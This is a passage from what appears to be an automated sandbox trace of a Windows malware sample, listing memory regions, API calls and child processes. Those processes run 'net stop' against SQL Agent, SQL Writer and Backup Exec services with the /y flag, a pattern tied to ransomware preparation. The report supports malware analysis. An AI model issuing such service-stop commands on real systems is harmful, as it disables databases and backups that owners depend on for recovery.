0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10894 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10895 start_va = 0xff3d0000 end_va = 0xff402fff entry_point = 0xff3d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10896 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10897 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10898 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 10899 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 10900 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 10901 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10902 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10903 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10904 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10905 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10906 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 10907 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10908 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10909 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10910 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10911 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10912 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10913 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10914 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10915 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10916 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10917 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10918 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10919 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10920 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10921 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10922 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10923 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10924 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10925 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10994 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 805 os_tid = 0x1330 [0113.618] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafef0 | out: lpSystemTimeAsFileTime=0xafef0*(dwLowDateTime=0xf8dfff50, dwHighDateTime=0x1d48689)) [0113.618] GetCurrentProcessId () returned 0x1324 [0113.618] GetCurrentThreadId () returned 0x1330 [0113.618] GetTickCount () returned 0x2619f [0113.618] QueryPerformanceCounter (in: lpPerformanceCount=0xafef8 | out: lpPerformanceCount=0xafef8*=1816053600000) returned 1 [0113.620] GetModuleHandleW (lpModuleName=0x0) returned 0xff3d0000 [0113.620] __set_app_type (_Type=0x1) [0113.620] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3e9c9c) returned 0x0 [0113.620] __getmainargs (in: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788, _DoWildCard=0, _StartInfo=0xff3f479c | out: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788) returned 0 [0113.620] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.620] GetConsoleOutputCP () returned 0x1b5 [0113.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3fcec0 | out: lpCPInfo=0xff3fcec0) returned 1 [0113.903] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.905] sprintf_s (in: _DstBuf=0xafe98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.905] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.907] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0113.907] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0113.907] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$BKUPEXEC /y" [0113.907] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xafc30, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0113.907] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.907] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xafe88 | out: Buffer=0xafe88*=0x124d60) returned 0x0 [0113.907] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xafe88 | out: Buffer=0xafe88*=0x12c120) returned 0x0 [0113.907] _fileno (_File=0x7fefdba2a80) returned 0 [0113.907] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0113.908] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.908] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.908] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.908] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.908] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.908] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.908] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.908] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.908] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.908] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.908] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.908] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.908] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.908] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.908] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.908] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.908] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.908] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.908] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.908] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.908] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.908] _wcsicmp (_String1="accounts", _String2="SQLAgent$BKUPEXEC") returned -18 [0113.908] _wcsicmp (_String1="computer", _String2="SQLAgent$BKUPEXEC") returned -16 [0113.908] _wcsicmp (_String1="config", _String2="SQLAgent$BKUPEXEC") returned -16 [0113.909] _wcsicmp (_String1="continue", _String2="SQLAgent$BKUPEXEC") returned -16 [0113.909] _wcsicmp (_String1="cont", _String2="SQLAgent$BKUPEXEC") returned -16 [0113.909] _wcsicmp (_String1="file", _String2="SQLAgent$BKUPEXEC") returned -13 [0113.909] _wcsicmp (_String1="files", _String2="SQLAgent$BKUPEXEC") returned -13 [0113.909] _wcsicmp (_String1="group", _String2="SQLAgent$BKUPEXEC") returned -12 [0113.909] _wcsicmp (_String1="groups", _String2="SQLAgent$BKUPEXEC") returned -12 [0113.909] _wcsicmp (_String1="help", _String2="SQLAgent$BKUPEXEC") returned -11 [0113.909] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$BKUPEXEC") returned -11 [0113.909] _wcsicmp (_String1="localgroup", _String2="SQLAgent$BKUPEXEC") returned -7 [0113.909] _wcsicmp (_String1="pause", _String2="SQLAgent$BKUPEXEC") returned -3 [0113.909] _wcsicmp (_String1="session", _String2="SQLAgent$BKUPEXEC") returned -12 [0113.909] _wcsicmp (_String1="sessions", _String2="SQLAgent$BKUPEXEC") returned -12 [0113.909] _wcsicmp (_String1="sess", _String2="SQLAgent$BKUPEXEC") returned -12 [0113.909] _wcsicmp (_String1="share", _String2="SQLAgent$BKUPEXEC") returned -9 [0113.909] _wcsicmp (_String1="start", _String2="SQLAgent$BKUPEXEC") returned 3 [0113.909] _wcsicmp (_String1="stats", _String2="SQLAgent$BKUPEXEC") returned 3 [0113.909] _wcsicmp (_String1="statistics", _String2="SQLAgent$BKUPEXEC") returned 3 [0113.909] _wcsicmp (_String1="stop", _String2="SQLAgent$BKUPEXEC") returned 3 [0113.909] _wcsicmp (_String1="time", _String2="SQLAgent$BKUPEXEC") returned 1 [0113.909] _wcsicmp (_String1="user", _String2="SQLAgent$BKUPEXEC") returned 2 [0113.909] _wcsicmp (_String1="users", _String2="SQLAgent$BKUPEXEC") returned 2 [0113.909] _wcsicmp (_String1="msg", _String2="SQLAgent$BKUPEXEC") returned -6 [0113.909] _wcsicmp (_String1="messenger", _String2="SQLAgent$BKUPEXEC") returned -6 [0113.909] _wcsicmp (_String1="receiver", _String2="SQLAgent$BKUPEXEC") returned -1 [0113.909] _wcsicmp (_String1="rcv", _String2="SQLAgent$BKUPEXEC") returned -1 [0113.909] _wcsicmp (_String1="netpopup", _String2="SQLAgent$BKUPEXEC") returned -5 [0113.909] _wcsicmp (_String1="redirector", _String2="SQLAgent$BKUPEXEC") returned -1 [0113.909] _wcsicmp (_String1="redir", _String2="SQLAgent$BKUPEXEC") returned -1 [0113.909] _wcsicmp (_String1="rdr", _String2="SQLAgent$BKUPEXEC") returned -1 [0113.909] _wcsicmp (_String1="workstation", _String2="SQLAgent$BKUPEXEC") returned 4 [0113.909] _wcsicmp (_String1="work", _String2="SQLAgent$BKUPEXEC") returned 4 [0113.909] _wcsicmp (_String1="wksta", _String2="SQLAgent$BKUPEXEC") returned 4 [0113.909] _wcsicmp (_String1="prdr", _String2="SQLAgent$BKUPEXEC") returned -3 [0113.909] _wcsicmp (_String1="devrdr", _String2="SQLAgent$BKUPEXEC") returned -15 [0113.910] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$BKUPEXEC") returned -7 [0113.910] _wcsicmp (_String1="server", _String2="SQLAgent$BKUPEXEC") returned -12 [0113.910] _wcsicmp (_String1="svr", _String2="SQLAgent$BKUPEXEC") returned 5 [0113.910] _wcsicmp (_String1="srv", _String2="SQLAgent$BKUPEXEC") returned 1 [0113.910] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$BKUPEXEC") returned -7 [0113.910] _wcsicmp (_String1="alerter", _String2="SQLAgent$BKUPEXEC") returned -18 [0113.910] _wcsicmp (_String1="netlogon", _String2="SQLAgent$BKUPEXEC") returned -5 [0113.910] _wcsupr (in: _String="SQLAgent$BKUPEXEC" | out: _String="SQLAGENT$BKUPEXEC") returned="SQLAGENT$BKUPEXEC" [0113.910] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x12ce30 [0113.915] GetServiceKeyNameW (in: hSCManager=0x12ce30, lpDisplayName="SQLAGENT$BKUPEXEC", lpServiceName=0xff3f5750, lpcchBuffer=0xafda8 | out: lpServiceName="", lpcchBuffer=0xafda8) returned 0 [0113.916] _wcsicmp (_String1="msg", _String2="SQLAGENT$BKUPEXEC") returned -6 [0113.916] _wcsicmp (_String1="messenger", _String2="SQLAGENT$BKUPEXEC") returned -6 [0113.916] _wcsicmp (_String1="receiver", _String2="SQLAGENT$BKUPEXEC") returned -1 [0113.916] _wcsicmp (_String1="rcv", _String2="SQLAGENT$BKUPEXEC") returned -1 [0113.916] _wcsicmp (_String1="redirector", _String2="SQLAGENT$BKUPEXEC") returned -1 [0113.916] _wcsicmp (_String1="redir", _String2="SQLAGENT$BKUPEXEC") returned -1 [0113.916] _wcsicmp (_String1="rdr", _String2="SQLAGENT$BKUPEXEC") returned -1 [0113.916] _wcsicmp (_String1="workstation", _String2="SQLAGENT$BKUPEXEC") returned 4 [0113.916] _wcsicmp (_String1="work", _String2="SQLAGENT$BKUPEXEC") returned 4 [0113.916] _wcsicmp (_String1="wksta", _String2="SQLAGENT$BKUPEXEC") returned 4 [0113.916] _wcsicmp (_String1="prdr", _String2="SQLAGENT$BKUPEXEC") returned -3 [0113.916] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$BKUPEXEC") returned -15 [0113.916] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$BKUPEXEC") returned -7 [0113.916] _wcsicmp (_String1="server", _String2="SQLAGENT$BKUPEXEC") returned -12 [0113.916] _wcsicmp (_String1="svr", _String2="SQLAGENT$BKUPEXEC") returned 5 [0113.916] _wcsicmp (_String1="srv", _String2="SQLAGENT$BKUPEXEC") returned 1 [0113.916] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$BKUPEXEC") returned -7 [0113.917] _wcsicmp (_String1="alerter", _String2="SQLAGENT$BKUPEXEC") returned -18 [0113.917] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$BKUPEXEC") returned -5 [0113.917] NetServiceControl (in: servername=0x0, service="SQLAGENT$BKUPEXEC", opcode=0x0, arg=0x0, bufptr=0xafdb0 | out: bufptr=0xafdb0) returned 0x889 [0113.918] wcscpy_s (in: _Destination=0xff3f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.918] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0113.919] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.920] GetFileType (hFile=0xb) returned 0x2 [0113.920] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xafc78 | out: lpMode=0xafc78) returned 1 [0113.921] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xafc70, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0xafc70*=0x1e) returned 1 [0113.921] GetFileType (hFile=0xb) returned 0x2 [0113.921] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xafc78 | out: lpMode=0xafc78) returned 1 [0113.921] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xafc70, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0xafc70*=0x2) returned 1 [0113.922] _ultow (in: _Dest=0x889, _Radix=720096 | out: _Dest=0x889) returned="2185" [0113.922] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.922] GetFileType (hFile=0xb) returned 0x2 [0113.922] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xafc78 | out: lpMode=0xafc78) returned 1 [0113.922] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xafc70, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0xafc70*=0x34) returned 1 [0113.923] GetFileType (hFile=0xb) returned 0x2 [0113.923] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xafc78 | out: lpMode=0xafc78) returned 1 [0113.923] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xafc70, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0xafc70*=0x2) returned 1 [0113.924] NetApiBufferFree (Buffer=0x124d60) returned 0x0 [0113.924] NetApiBufferFree (Buffer=0x12c120) returned 0x0 [0113.924] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$BKUPEXEC /y" [0113.924] exit (_Code=2) Process: id = "304" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6beb2000" os_pid = "0x4e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLTELEMETRY$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10929 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10930 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10931 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10932 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 10933 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10934 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10935 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10936 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10937 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10938 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10939 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 10940 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10941 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 10942 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10943 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 806 os_tid = 0x77c Process: id = "305" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x25bd2000" os_pid = "0xa50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLWriter /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10996 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10997 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10998 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10999 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 11000 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11001 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11002 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11003 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11004 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11005 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11006 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 11007 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 815 os_tid = 0x9bc Process: id = "306" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x574a2000" os_pid = "0x96c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "270" os_parent_pid = "0x10c8" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11008 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11009 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11010 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11011 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 11012 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11013 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11014 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11015 start_va = 0xff3d0000 end_va = 0xff402fff entry_point = 0xff3d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11016 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11017 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11018 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 11019 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 